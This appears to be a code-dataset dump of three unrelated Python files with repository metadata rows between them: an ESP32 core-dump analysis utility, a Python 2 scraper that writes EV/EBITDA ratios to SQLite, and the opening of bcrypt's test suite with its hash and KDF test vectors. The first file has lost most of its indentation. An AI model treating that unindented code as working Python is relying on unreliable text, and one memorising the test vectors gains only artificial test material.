if note_sec.type == ESPCoreDumpElfFile.PT_TASK_INFO and 'TASK_INFO' in note_sec.name.decode('ascii'):
task_info_struct = EspTaskStatus.parse(note_sec.desc)
task_info.append(task_info_struct)
print('===============================================================')
print('==================== ESP32 CORE DUMP START ====================')
rom_elf, rom_sym_cmd = load_aux_elf(args.rom_elf)
gdb = EspGDB(args.gdb, [rom_sym_cmd], core_filename, args.prog, timeout_sec=args.gdb_timeout_sec)
extra_info = None
if extra_note:
extra_info = Struct('regs' / GreedyRange(Int32ul)).parse(extra_note.desc).regs
marker = extra_info[0]
if marker == ESPCoreDumpElfFile.CURR_TASK_MARKER:
print('\nCrashed task has been skipped.')
else:
task_name = gdb.get_freertos_task_name(marker)
print("\nCrashed task handle: 0x%x, name: '%s', GDB name: 'process %d'" % (marker, task_name, marker))
print('\n================== CURRENT THREAD REGISTERS ===================')
if extra_note and extra_info:
exception_registers_info(extra_info)
else:
print('Exception registers have not been found!')
print(gdb.run_cmd('info registers'))
print('\n==================== CURRENT THREAD STACK =====================')
print(gdb.run_cmd('bt'))
if task_info and task_info[0].task_flags != TASK_STATUS_CORRECT:
print('The current crashed task is corrupted.')
print('Task #%d info: flags, tcb, stack (%x, %x, %x).' % (task_info[0].task_index,
task_info[0].task_flags,
task_info[0].task_tcb_addr,
task_info[0].task_stack_start))
print('\n======================== THREADS INFO =========================')
print(gdb.run_cmd('info threads'))
# THREADS STACKS
threads, _ = gdb.get_thread_info()
for thr in threads:
thr_id = int(thr['id'])
tcb_addr = gdb.gdb2freertos_thread_id(thr['target-id'])
task_index = int(thr_id) - 1
task_name = gdb.get_freertos_task_name(tcb_addr)
gdb.switch_thread(thr_id)
print('\n==================== THREAD {} (TCB: 0x{:x}, name: \'{}\') ====================='
.format(thr_id, tcb_addr, task_name))
print(gdb.run_cmd('bt'))
if task_info and task_info[task_index].task_flags != TASK_STATUS_CORRECT:
print("The task '%s' is corrupted." % thr_id)
print('Task #%d info: flags, tcb, stack (%x, %x, %x).' % (task_info[task_index].task_index,
task_info[task_index].task_flags,
task_info[task_index].task_tcb_addr,
task_info[task_index].task_stack_start))
print('\n\n======================= ALL MEMORY REGIONS ========================')
print('Name Address Size Attrs')
merged_segs = []
core_segs = core_elf.load_segments
for sec in exe_elf.sections:
merged = False
for seg in core_segs:
if seg.addr <= sec.addr <= seg.addr + len(seg.data):
# sec: |XXXXXXXXXX|
# seg: |...XXX.............|
seg_addr = seg.addr
if seg.addr + len(seg.data) <= sec.addr + len(sec.data):
# sec: |XXXXXXXXXX|
# seg: |XXXXXXXXXXX...|
# merged: |XXXXXXXXXXXXXX|
seg_len = len(sec.data) + (sec.addr - seg.addr)
else:
# sec: |XXXXXXXXXX|
# seg: |XXXXXXXXXXXXXXXXX|
# merged: |XXXXXXXXXXXXXXXXX|
seg_len = len(seg.data)
merged_segs.append((sec.name, seg_addr, seg_len, sec.attr_str(), True))
core_segs.remove(seg)
merged = True
elif sec.addr <= seg.addr <= sec.addr + len(sec.data):
# sec: |XXXXXXXXXX|
# seg: |...XXX.............|
seg_addr = sec.addr
if (seg.addr + len(seg.data)) >= (sec.addr + len(sec.data)):
# sec: |XXXXXXXXXX|
# seg: |..XXXXXXXXXXX|
# merged: |XXXXXXXXXXXXX|
seg_len = len(sec.data) + (seg.addr + len(seg.data)) - (sec.addr + len(sec.data))
else:
# sec: |XXXXXXXXXX|
# seg: |XXXXXX|
# merged: |XXXXXXXXXX|
seg_len = len(sec.data)
merged_segs.append((sec.name, seg_addr, seg_len, sec.attr_str(), True))
core_segs.remove(seg)
merged = True
if not merged:
merged_segs.append((sec.name, sec.addr, len(sec.data), sec.attr_str(), False))
for ms in merged_segs:
print('%s 0x%x 0x%x %s' % (ms[0], ms[1], ms[2], ms[3]))
for cs in core_segs:
        # core dump exec segments are from ROM; others belong to tasks (TCB or stack)
if cs.flags & ElfSegment.PF_X:
seg_name = 'rom.text'
else:
seg_name = 'tasks.data'
print('.coredump.%s 0x%x 0x%x %s' % (seg_name, cs.addr, len(cs.data), cs.attr_str()))
if args.print_mem:
print('\n====================== CORE DUMP MEMORY CONTENTS ========================')
for cs in core_elf.load_segments:
            # core dump exec segments are from ROM; others belong to tasks (TCB or stack)
if cs.flags & ElfSegment.PF_X:
seg_name = 'rom.text'
else:
seg_name = 'tasks.data'
print('.coredump.%s 0x%x 0x%x %s' % (seg_name, cs.addr, len(cs.data), cs.attr_str()))
print(gdb.run_cmd('x/%dx 0x%x' % (len(cs.data) // 4, cs.addr)))
print('\n===================== ESP32 CORE DUMP END =====================')
print('===============================================================')
del gdb
print('Done!')
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='espcoredump.py v%s - ESP32 Core Dump Utility' % __version__)
parser.add_argument('--port', '-p', default=os.environ.get('ESPTOOL_PORT', esptool.ESPLoader.DEFAULT_PORT),
help='Serial port device')
parser.add_argument('--baud', '-b', type=int,
default=os.environ.get('ESPTOOL_BAUD', esptool.ESPLoader.ESP_ROM_BAUD),
help='Serial port baud rate used when flashing/reading')
parser.add_argument('--gdb-timeout-sec', type=int, default=DEFAULT_GDB_TIMEOUT_SEC,
help='Overwrite the default internal delay for gdb responses')
common_args = argparse.ArgumentParser(add_help=False)
common_args.add_argument('--debug', '-d', type=int, default=3,
help='Log level (0..3)')
common_args.add_argument('--gdb', '-g', default='xtensa-esp32-elf-gdb',
help='Path to gdb')
common_args.add_argument('--core', '-c',
help='Path to core dump file (if skipped core dump will be read from flash)')
common_args.add_argument('--core-format', '-t', choices=['b64', 'elf', 'raw'], default='elf',
help='(elf, raw or b64). File specified with "-c" is an ELF ("elf"), '
'raw (raw) or base64-encoded (b64) binary')
common_args.add_argument('--off', '-o', type=int,
help='Offset of coredump partition in flash (type "make partition_table" to see).')
common_args.add_argument('--save-core', '-s',
help='Save core to file. Otherwise temporary core file will be deleted. '
'Does not work with "-c"', )
common_args.add_argument('--rom-elf', '-r', default='esp32_rom.elf',
help='Path to ROM ELF file.')
common_args.add_argument('prog', help='Path to program\'s ELF binary')
operations = parser.add_subparsers(dest='operation')
operations.add_parser('dbg_corefile', parents=[common_args],
help='Starts GDB debugging session with specified corefile')
info_coredump = operations.add_parser('info_corefile', parents=[common_args],
help='Print core dump info from file')
info_coredump.add_argument('--print-mem', '-m', action='store_true',
help='Print memory dump')
args = parser.parse_args()
if args.debug == 0:
log_level = logging.CRITICAL
elif args.debug == 1:
log_level = logging.ERROR
elif args.debug == 2:
log_level = logging.WARNING
elif args.debug == 3:
log_level = logging.INFO
else:
log_level = logging.DEBUG
logging.basicConfig(format='%(levelname)s: %(message)s', level=log_level)
print('espcoredump.py v%s' % __version__)
if args.operation == 'info_corefile':
info_corefile()
elif args.operation == 'dbg_corefile':
dbg_corefile()
else:
raise ValueError('Please specify action, should be info_corefile or dbg_corefile')
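# Illustrative invocations (not part of the original script; paths are hypothetical):
#   espcoredump.py info_corefile -t b64 -c core.b64 build/app.elf
#   espcoredump.py dbg_corefile -c core.elf build/app.elf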
| 44.07
| 115
| 0.553438
|
126e165b2c882acbbb1ce347dc28b3d8dc3875a7
| 3,254
|
py
|
Python
|
bookkeeping/evEbitdaUpdate.py
|
investr/investr-docker
|
f58bf446185b88e447b94bd8bebcc38ac5d0c3a4
|
[
"MIT"
] | 35
|
2019-07-25T05:47:57.000Z
|
2022-01-30T11:36:09.000Z
|
bookkeeping/evEbitdaUpdate.py
|
cbzxt/investr-docker
|
592640bafe9612976fff329e45daf4efcc8450bb
|
[
"MIT"
] | 3
|
2019-08-13T13:30:09.000Z
|
2019-08-23T04:10:03.000Z
|
bookkeeping/evEbitdaUpdate.py
|
cbzxt/investr-docker
|
592640bafe9612976fff329e45daf4efcc8450bb
|
[
"MIT"
] | 11
|
2019-07-25T07:42:12.000Z
|
2020-06-27T07:18:51.000Z
|
#!/usr/bin/env python
# Initially created by: Chirag Rathod for https://investr.co.in (Gentle Request: Please don't delete this line)
#
# Updates enterprise value and EBITDA
#
# Note: This script silently passes the exceptions so be careful!
# Check the log file for any exceptions.
#
import os
import sys
import traceback
import requests
import logging
import sqlite3 as lite
from moneyControl import *
from BeautifulSoup import BeautifulSoup
def main():
# Get the arguments passed in the following format:
# 1st parameter: File Name
# 2nd parameter: 1 or 0 (1 Updates backend DB, 0 just logs the results)
    # 3rd and later parameters: Stock IDs
if len(sys.argv) < 3:
print 'Pass correct number of parameters!'
exit()
args = sys.argv
idsToProcess = args[2:]
idsToProcess = map(int, idsToProcess) # Convert the string array to int array
# Logging
logFile = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'logs' + os.sep + os.path.splitext(os.path.basename(__file__))[0] + '.log'
logging.basicConfig(filename=logFile, level=logging.INFO)
logging.getLogger("requests").setLevel(logging.WARNING)
# Get and populate data
try:
stocksDBLocation = os.path.dirname(os.path.realpath(__file__)) + os.sep + 'ec2stocks.db'
con = lite.connect(stocksDBLocation)
cur = con.cursor()
# Get the tables in this DB
cur.execute('SELECT ID, MC_CODE, MC_NAME, MC_S_OR_C, MC_URL, LAST_QTR FROM MASTER')
rows = cur.fetchall()
# Loop thru the data
for row in rows:
try:
myid = row[0]
mcCode = row[1]
mcName = row[2]
mcSOrC = row[3]
mcUrl = row[4]
lastQtr = row[5]
if myid not in idsToProcess:
continue
# First get EV/EBITDA ratio for the last two years from ratios page
ratiosUrl = 'http://www.moneycontrol.com/financials/' + mcName + '/ratiosVI/' + mcCode
yearlyResults = requests.get(ratiosUrl)
parsedHtml = BeautifulSoup(yearlyResults.text)
(dataY1, dataY2) = getMCData(parsedHtml, 'EV/EBITDA (X)', 2)
                # Banks don't have this ratio and will return -999.99. Change it to 0.
if dataY1 == -999.99:
dataY1 = 0
if dataY2 == -999.99:
dataY2 = 0
# Update DB only if the second parameter is 1. When 0, we will just log the proposed update.
if args[1] == "1":
cur.execute('UPDATE MASTER SET EV_EBITDA_Y1 = ?, EV_EBITDA_Y2 = ? WHERE ID = ?', (dataY1, dataY2, myid))
logging.info('Updating ID: %s \n EV_EBITDA_Y1: %s | EV_EBITDA_Y2: %s \n', myid, dataY1, dataY2)
except Exception:
logging.info('Exception raised while processing: ' + str(myid) + ' ... Name ... ' + mcName)
logging.info(traceback.format_exc())
except lite.Error as er:
logging.info(er)
finally:
con.commit()
con.close()
logging.info('Finished Updating Data!')
if __name__ == '__main__':
main()
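# Illustrative invocation (not part of the original script; stock IDs are hypothetical):
#   python evEbitdaUpdate.py 0 12 57 103   # dry run: only logs the proposed updates
#   python evEbitdaUpdate.py 1 12 57 103   # writes EV_EBITDA_Y1/Y2 back to the DB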
| 32.54
| 143
| 0.594038
|
7ad40f76349177e6b366e443bbd2bd27ff095c62
| 15,656
|
py
|
Python
|
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
tests/test_bcrypt.py
|
balabit-deps/balabit-os-7-python-bcrypt
|
bf0105f1a09bd668e6f61a5497ae528cd0877080
|
[
"Apache-2.0"
] | null | null | null |
import os
import pytest
import six
import bcrypt
_test_vectors = [
(
b"Kk4DQuMMfZL9o",
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO026BWLIoQMD/TXg5uZV.0P.uO8m3YEm",
),
(
b"9IeRXmnGxMYbs",
b"$2b$04$pQ7gRO7e6wx/936oXhNjrO",
b"$2b$04$pQ7gRO7e6wx/936oXhNjrOUNOHL1D0h1N2IDbJZYs.1ppzSof6SPy",
),
(
b"xVQVbwa1S0M8r",
b"$2b$04$SQe9knOzepOVKoYXo9xTte",
b"$2b$04$SQe9knOzepOVKoYXo9xTteNYr6MBwVz4tpriJVe3PNgYufGIsgKcW",
),
(
b"Zfgr26LWd22Za",
b"$2b$04$eH8zX.q5Q.j2hO1NkVYJQO",
b"$2b$04$eH8zX.q5Q.j2hO1NkVYJQOM6KxntS/ow3.YzVmFrE4t//CoF4fvne",
),
(
b"Tg4daC27epFBE",
b"$2b$04$ahiTdwRXpUG2JLRcIznxc.",
b"$2b$04$ahiTdwRXpUG2JLRcIznxc.s1.ydaPGD372bsGs8NqyYjLY1inG5n2",
),
(
b"xhQPMmwh5ALzW",
b"$2b$04$nQn78dV0hGHf5wUBe0zOFu",
b"$2b$04$nQn78dV0hGHf5wUBe0zOFu8n07ZbWWOKoGasZKRspZxtt.vBRNMIy",
),
(
b"59je8h5Gj71tg",
b"$2b$04$cvXudZ5ugTg95W.rOjMITu",
b"$2b$04$cvXudZ5ugTg95W.rOjMITuM1jC0piCl3zF5cmGhzCibHZrNHkmckG",
),
(
b"wT4fHJa2N9WSW",
b"$2b$04$YYjtiq4Uh88yUsExO0RNTu",
b"$2b$04$YYjtiq4Uh88yUsExO0RNTuEJ.tZlsONac16A8OcLHleWFjVawfGvO",
),
(
b"uSgFRnQdOgm4S",
b"$2b$04$WLTjgY/pZSyqX/fbMbJzf.",
b"$2b$04$WLTjgY/pZSyqX/fbMbJzf.qxCeTMQOzgL.CimRjMHtMxd/VGKojMu",
),
(
b"tEPtJZXur16Vg",
b"$2b$04$2moPs/x/wnCfeQ5pCheMcu",
b"$2b$04$2moPs/x/wnCfeQ5pCheMcuSJQ/KYjOZG780UjA/SiR.KsYWNrC7SG",
),
(
b"vvho8C6nlVf9K",
b"$2b$04$HrEYC/AQ2HS77G78cQDZQ.",
b"$2b$04$HrEYC/AQ2HS77G78cQDZQ.r44WGcruKw03KHlnp71yVQEwpsi3xl2",
),
(
b"5auCCY9by0Ruf",
b"$2b$04$vVYgSTfB8KVbmhbZE/k3R.",
b"$2b$04$vVYgSTfB8KVbmhbZE/k3R.ux9A0lJUM4CZwCkHI9fifke2.rTF7MG",
),
(
b"GtTkR6qn2QOZW",
b"$2b$04$JfoNrR8.doieoI8..F.C1O",
b"$2b$04$JfoNrR8.doieoI8..F.C1OQgwE3uTeuardy6lw0AjALUzOARoyf2m",
),
(
b"zKo8vdFSnjX0f",
b"$2b$04$HP3I0PUs7KBEzMBNFw7o3O",
b"$2b$04$HP3I0PUs7KBEzMBNFw7o3O7f/uxaZU7aaDot1quHMgB2yrwBXsgyy",
),
(
b"I9VfYlacJiwiK",
b"$2b$04$xnFVhJsTzsFBTeP3PpgbMe",
b"$2b$04$xnFVhJsTzsFBTeP3PpgbMeMREb6rdKV9faW54Sx.yg9plf4jY8qT6",
),
(
b"VFPO7YXnHQbQO",
b"$2b$04$WQp9.igoLqVr6Qk70mz6xu",
b"$2b$04$WQp9.igoLqVr6Qk70mz6xuRxE0RttVXXdukpR9N54x17ecad34ZF6",
),
(
b"VDx5BdxfxstYk",
b"$2b$04$xgZtlonpAHSU/njOCdKztO",
b"$2b$04$xgZtlonpAHSU/njOCdKztOPuPFzCNVpB4LGicO4/OGgHv.uKHkwsS",
),
(
b"dEe6XfVGrrfSH",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe",
),
(
b"cTT0EAFdwJiLn",
b"$2b$04$7/Qj7Kd8BcSahPO4khB8me",
b"$2b$04$7/Qj7Kd8BcSahPO4khB8me4ssDJCW3r4OGYqPF87jxtrSyPj5cS5m",
),
(
b"J8eHUDuxBB520",
b"$2b$04$VvlCUKbTMjaxaYJ.k5juoe",
b"$2b$04$VvlCUKbTMjaxaYJ.k5juoecpG/7IzcH1AkmqKi.lIZMVIOLClWAk.",
),
(
b"U*U",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.E5YPO9kmyuRGyh0XouQYb4YMJKvyOeW",
),
(
b"U*U*",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.",
b"$2a$05$CCCCCCCCCCCCCCCCCCCCC.VGOzA784oUp/Z0DY336zx7pLYAy0lwK",
),
(
b"U*U*U",
b"$2a$05$XXXXXXXXXXXXXXXXXXXXXO",
b"$2a$05$XXXXXXXXXXXXXXXXXXXXXOAcXxm9kjPGEMsLznoKqmqw7tc8WCx4a",
),
(
b"0123456789abcdefghijklmnopqrstuvwxyz"
b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
b"chars after 72 are ignored",
b"$2a$05$abcdefghijklmnopqrstuu",
b"$2a$05$abcdefghijklmnopqrstuu5s2v8.iXieOjg/.AySBTTZIIVFJeBui",
),
(
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa"
b"chars after 72 are ignored as usual",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.swQOIzjOiJ9GHEPuhEkvqrUyvWhEMx6"
),
(
b"\xa3",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.",
b"$2a$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq"
),
]
_2y_test_vectors = [
(
b"\xa3",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.Sa7shbm4.OzKpvFnX1pQLmQW96oUlCq",
),
(
b"\xff\xff\xa3",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.CE5elHaaO4EbggVDjb8P19RukzXSM3e",
b"$2y$05$/OK.fbVrR/bpIqNJ5ianF.CE5elHaaO4EbggVDjb8P19RukzXSM3e",
),
]
def test_gensalt_basic(monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt() == b"$2b$12$KB.uKB.uKB.uKB.uKB.uK."
@pytest.mark.parametrize(("rounds", "expected"), [
(4, b"$2b$04$KB.uKB.uKB.uKB.uKB.uK."),
(5, b"$2b$05$KB.uKB.uKB.uKB.uKB.uK."),
(6, b"$2b$06$KB.uKB.uKB.uKB.uKB.uK."),
(7, b"$2b$07$KB.uKB.uKB.uKB.uKB.uK."),
(8, b"$2b$08$KB.uKB.uKB.uKB.uKB.uK."),
(9, b"$2b$09$KB.uKB.uKB.uKB.uKB.uK."),
(10, b"$2b$10$KB.uKB.uKB.uKB.uKB.uK."),
(11, b"$2b$11$KB.uKB.uKB.uKB.uKB.uK."),
(12, b"$2b$12$KB.uKB.uKB.uKB.uKB.uK."),
(13, b"$2b$13$KB.uKB.uKB.uKB.uKB.uK."),
(14, b"$2b$14$KB.uKB.uKB.uKB.uKB.uK."),
(15, b"$2b$15$KB.uKB.uKB.uKB.uKB.uK."),
(16, b"$2b$16$KB.uKB.uKB.uKB.uKB.uK."),
(17, b"$2b$17$KB.uKB.uKB.uKB.uKB.uK."),
(18, b"$2b$18$KB.uKB.uKB.uKB.uKB.uK."),
(19, b"$2b$19$KB.uKB.uKB.uKB.uKB.uK."),
(20, b"$2b$20$KB.uKB.uKB.uKB.uKB.uK."),
(21, b"$2b$21$KB.uKB.uKB.uKB.uKB.uK."),
(22, b"$2b$22$KB.uKB.uKB.uKB.uKB.uK."),
(23, b"$2b$23$KB.uKB.uKB.uKB.uKB.uK."),
(24, b"$2b$24$KB.uKB.uKB.uKB.uKB.uK."),
])
def test_gensalt_rounds_valid(rounds, expected, monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt(rounds) == expected
@pytest.mark.parametrize("rounds", list(range(1, 4)))
def test_gensalt_rounds_invalid(rounds):
with pytest.raises(ValueError):
bcrypt.gensalt(rounds)
def test_gensalt_bad_prefix():
with pytest.raises(ValueError):
bcrypt.gensalt(prefix="bad")
def test_gensalt_2a_prefix(monkeypatch):
monkeypatch.setattr(os, "urandom", lambda n: b"0000000000000000")
assert bcrypt.gensalt(prefix=b"2a") == b"$2a$12$KB.uKB.uKB.uKB.uKB.uK."
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_hashpw_new(password, salt, hashed):
assert bcrypt.hashpw(password, salt) == hashed
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_checkpw(password, salt, hashed):
assert bcrypt.checkpw(password, hashed) is True
@pytest.mark.parametrize(("password", "salt", "hashed"), _test_vectors)
def test_hashpw_existing(password, salt, hashed):
assert bcrypt.hashpw(password, hashed) == hashed
@pytest.mark.parametrize(("password", "hashed", "expected"), _2y_test_vectors)
def test_hashpw_2y_prefix(password, hashed, expected):
assert bcrypt.hashpw(password, hashed) == expected
@pytest.mark.parametrize(("password", "hashed", "expected"), _2y_test_vectors)
def test_checkpw_2y_prefix(password, hashed, expected):
assert bcrypt.checkpw(password, hashed) is True
def test_hashpw_invalid():
with pytest.raises(ValueError):
bcrypt.hashpw(b"password", b"$2z$04$cVWp4XaNU8a4v1uMRum2SO")
def test_checkpw_wrong_password():
assert bcrypt.checkpw(
b"badpass",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
) is False
def test_checkpw_bad_salt():
with pytest.raises(ValueError):
bcrypt.checkpw(
b"badpass",
b"$2b$04$?Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
def test_checkpw_str_password():
with pytest.raises(TypeError):
bcrypt.checkpw(
six.text_type("password"),
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
)
def test_checkpw_str_salt():
with pytest.raises(TypeError):
bcrypt.checkpw(
b"password",
six.text_type("$2b$04$cVWp4XaNU8a4v1uMRum2SO"),
)
def test_hashpw_str_password():
with pytest.raises(TypeError):
bcrypt.hashpw(
six.text_type("password"),
b"$2b$04$cVWp4XaNU8a4v1uMRum2SO",
)
def test_hashpw_str_salt():
with pytest.raises(TypeError):
bcrypt.hashpw(
b"password",
six.text_type("$2b$04$cVWp4XaNU8a4v1uMRum2SO"),
)
def test_checkpw_nul_byte():
with pytest.raises(ValueError):
bcrypt.checkpw(
b"abc\0def",
b"$2b$04$2Siw3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
with pytest.raises(ValueError):
bcrypt.checkpw(
b"abcdef",
b"$2b$04$2S\0w3Nv3Q/gTOIPetAyPr.GNj3aO0lb1E5E9UumYGKjP9BYqlNWJe"
)
def test_hashpw_nul_byte():
salt = bcrypt.gensalt(4)
with pytest.raises(ValueError):
bcrypt.hashpw(b"abc\0def", salt)
def test_checkpw_extra_data():
salt = bcrypt.gensalt(4)
hashed = bcrypt.hashpw(b"abc", salt)
assert bcrypt.checkpw(b"abc", hashed)
assert bcrypt.checkpw(b"abc", hashed + b"extra") is False
assert bcrypt.checkpw(b"abc", hashed[:-10]) is False
@pytest.mark.parametrize(
("rounds", "password", "salt", "expected"),
[[
4, b"password", b"salt",
b"\x5b\xbf\x0c\xc2\x93\x58\x7f\x1c\x36\x35\x55\x5c\x27\x79\x65\x98"
b"\xd4\x7e\x57\x90\x71\xbf\x42\x7e\x9d\x8f\xbe\x84\x2a\xba\x34\xd9"
], [
4, b"password", b"\x00",
b"\xc1\x2b\x56\x62\x35\xee\xe0\x4c\x21\x25\x98\x97\x0a\x57\x9a\x67"
], [
4, b"\x00", b"salt",
b"\x60\x51\xbe\x18\xc2\xf4\xf8\x2c\xbf\x0e\xfe\xe5\x47\x1b\x4b\xb9"
], [
        # nul bytes in password and salt
4, b"password\x00", b"salt\x00",
b"\x74\x10\xe4\x4c\xf4\xfa\x07\xbf\xaa\xc8\xa9\x28\xb1\x72\x7f\xac"
b"\x00\x13\x75\xe7\xbf\x73\x84\x37\x0f\x48\xef\xd1\x21\x74\x30\x50"
], [
4, b"pass\x00wor", b"sa\0l",
b"\xc2\xbf\xfd\x9d\xb3\x8f\x65\x69\xef\xef\x43\x72\xf4\xde\x83\xc0"
], [
4, b"pass\x00word", b"sa\0lt",
b"\x4b\xa4\xac\x39\x25\xc0\xe8\xd7\xf0\xcd\xb6\xbb\x16\x84\xa5\x6f"
], [
# bigger key
8, b"password", b"salt",
b"\xe1\x36\x7e\xc5\x15\x1a\x33\xfa\xac\x4c\xc1\xc1\x44\xcd\x23\xfa"
b"\x15\xd5\x54\x84\x93\xec\xc9\x9b\x9b\x5d\x9c\x0d\x3b\x27\xbe\xc7"
b"\x62\x27\xea\x66\x08\x8b\x84\x9b\x20\xab\x7a\xa4\x78\x01\x02\x46"
b"\xe7\x4b\xba\x51\x72\x3f\xef\xa9\xf9\x47\x4d\x65\x08\x84\x5e\x8d"
], [
# more rounds
42, b"password", b"salt",
b"\x83\x3c\xf0\xdc\xf5\x6d\xb6\x56\x08\xe8\xf0\xdc\x0c\xe8\x82\xbd"
], [
# longer password
8,
b"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do "
b"eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut "
b"enim ad minim veniam, quis nostrud exercitation ullamco laboris "
b"nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor "
b"in reprehenderit in voluptate velit esse cillum dolore eu fugiat "
b"nulla pariatur. Excepteur sint occaecat cupidatat non proident, "
b"sunt in culpa qui officia deserunt mollit anim id est laborum.",
b"salis\x00",
b"\x10\x97\x8b\x07\x25\x3d\xf5\x7f\x71\xa1\x62\xeb\x0e\x8a\xd3\x0a"
], [
# "unicode"
8,
b"\x0d\xb3\xac\x94\xb3\xee\x53\x28\x4f\x4a\x22\x89\x3b\x3c\x24\xae",
b"\x3a\x62\xf0\xf0\xdb\xce\xf8\x23\xcf\xcc\x85\x48\x56\xea\x10\x28",
b"\x20\x44\x38\x17\x5e\xee\x7c\xe1\x36\xc9\x1b\x49\xa6\x79\x23\xff"
], [
# very large key
8,
b"\x0d\xb3\xac\x94\xb3\xee\x53\x28\x4f\x4a\x22\x89\x3b\x3c\x24\xae",
b"\x3a\x62\xf0\xf0\xdb\xce\xf8\x23\xcf\xcc\x85\x48\x56\xea\x10\x28",
b"\x20\x54\xb9\xff\xf3\x4e\x37\x21\x44\x03\x34\x74\x68\x28\xe9\xed"
b"\x38\xde\x4b\x72\xe0\xa6\x9a\xdc\x17\x0a\x13\xb5\xe8\xd6\x46\x38"
b"\x5e\xa4\x03\x4a\xe6\xd2\x66\x00\xee\x23\x32\xc5\xed\x40\xad\x55"
b"\x7c\x86\xe3\x40\x3f\xbb\x30\xe4\xe1\xdc\x1a\xe0\x6b\x99\xa0\x71"
b"\x36\x8f\x51\x8d\x2c\x42\x66\x51\xc9\xe7\xe4\x37\xfd\x6c\x91\x5b"
b"\x1b\xbf\xc3\xa4\xce\xa7\x14\x91\x49\x0e\xa7\xaf\xb7\xdd\x02\x90"
b"\xa6\x78\xa4\xf4\x41\x12\x8d\xb1\x79\x2e\xab\x27\x76\xb2\x1e\xb4"
b"\x23\x8e\x07\x15\xad\xd4\x12\x7d\xff\x44\xe4\xb3\xe4\xcc\x4c\x4f"
b"\x99\x70\x08\x3f\x3f\x74\xbd\x69\x88\x73\xfd\xf6\x48\x84\x4f\x75"
b"\xc9\xbf\x7f\x9e\x0c\x4d\x9e\x5d\x89\xa7\x78\x39\x97\x49\x29\x66"
b"\x61\x67\x07\x61\x1c\xb9\x01\xde\x31\xa1\x97\x26\xb6\xe0\x8c\x3a"
b"\x80\x01\x66\x1f\x2d\x5c\x9d\xcc\x33\xb4\xaa\x07\x2f\x90\xdd\x0b"
b"\x3f\x54\x8d\x5e\xeb\xa4\x21\x13\x97\xe2\xfb\x06\x2e\x52\x6e\x1d"
b"\x68\xf4\x6a\x4c\xe2\x56\x18\x5b\x4b\xad\xc2\x68\x5f\xbe\x78\xe1"
b"\xc7\x65\x7b\x59\xf8\x3a\xb9\xab\x80\xcf\x93\x18\xd6\xad\xd1\xf5"
b"\x93\x3f\x12\xd6\xf3\x61\x82\xc8\xe8\x11\x5f\x68\x03\x0a\x12\x44"
], [
# UTF-8 Greek characters "odysseus" / "telemachos"
8,
b"\xe1\xbd\x88\xce\xb4\xcf\x85\xcf\x83\xcf\x83\xce\xb5\xcf\x8d\xcf"
b"\x82",
b"\xce\xa4\xce\xb7\xce\xbb\xce\xad\xce\xbc\xce\xb1\xcf\x87\xce\xbf"
b"\xcf\x82",
b"\x43\x66\x6c\x9b\x09\xef\x33\xed\x8c\x27\xe8\xe8\xf3\xe2\xd8\xe6"
]])
def test_kdf(rounds, password, salt, expected):
derived = bcrypt.kdf(password, salt, len(expected), rounds)
assert derived == expected
def test_kdf_str_password():
with pytest.raises(TypeError):
bcrypt.kdf(
six.text_type("password"), b"$2b$04$cVWp4XaNU8a4v1uMRum2SO", 10, 10
)
def test_kdf_str_salt():
with pytest.raises(TypeError):
bcrypt.kdf(
b"password", six.text_type("salt"), 10, 10
)
def test_kdf_no_warn_rounds():
bcrypt.kdf(
b"password", b"salt", 10, 10, True
)
def test_kdf_warn_rounds():
with pytest.warns(UserWarning):
bcrypt.kdf(
b"password", b"salt", 10, 10
)
@pytest.mark.parametrize(
("password", "salt", "desired_key_bytes", "rounds", "error"),
